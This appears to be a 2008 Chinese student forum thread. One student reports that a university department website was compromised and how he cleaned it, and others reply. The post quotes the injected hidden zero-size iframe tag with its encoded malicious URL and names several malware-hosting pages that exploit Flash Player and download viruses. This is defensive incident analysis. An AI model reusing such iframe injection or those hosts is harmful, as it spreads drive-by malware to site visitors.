(以下红色部分请勿轻易点击,否则后果自负)


浙科院机械学院网站 http://jdx.zust.edu.cn 被黑客入侵

网站内所有网页文件(ASP,HTM,HTML....)的末尾被添加了一句代码:

<iframe src=http://%61%76%65%31%2E%63%6 width=0 height=0></iframe>(意思是加载一个宽度和高度都为0也就是看不到的网页,最常用的挂马方式之一)


继续追查得到的信息:

http://%61%76%65%31%2E%63%6解析后的地址为http://ave1.cn

此网站中用iframe加载了另外两个恶意页面(见图一)

2.jpg (62.5 KB)
图一

2008-9-4 21:31

http://jzm015.cn/ilink.html能自动检测机器的Flash Player的版本然后利用各版本的漏洞加载不同的恶意SWF文件(见图二)

http://www.hxg006.cn/b2.htm 中包含一个加密的1936348.js和一个加密的fxx.htm ,作用是下载并执行病毒和跳转到新的恶意网站

很流行的手段,没必要继续看下去了



再次没想法.....彻底失望....



网站里的所有恶意代码我已经删了,现在可以安全访问了...

1.jpg (258.64 KB)
图二

2008-9-4 21:31

lz是？？好像很牛X的~

LZqiang da

小猪又被你发现了，好像不是第一次，了,N次了都

看不懂。。。
但LZ好像很厉害的样子

引用:

原帖由 左手无名指 于 2008-9-4 21:31 发表
lz是？？好像很牛X的~

大二机械的

酷酷猪，名字真酷~

引用:

原帖由 小熊寶寶 于 2008-9-4 21:32 发表
小猪又被你发现了，好像不是第一次，了,N次了都

才两次...不过学校犯的都是很低级的毛病..所以很不爽...

MS图片不能显示??

引用:

原帖由 kucoolzhu 于 2008-9-4 21:32 发表


大二机械的

对你有印象了，以前在挖坟是看到你的帖~~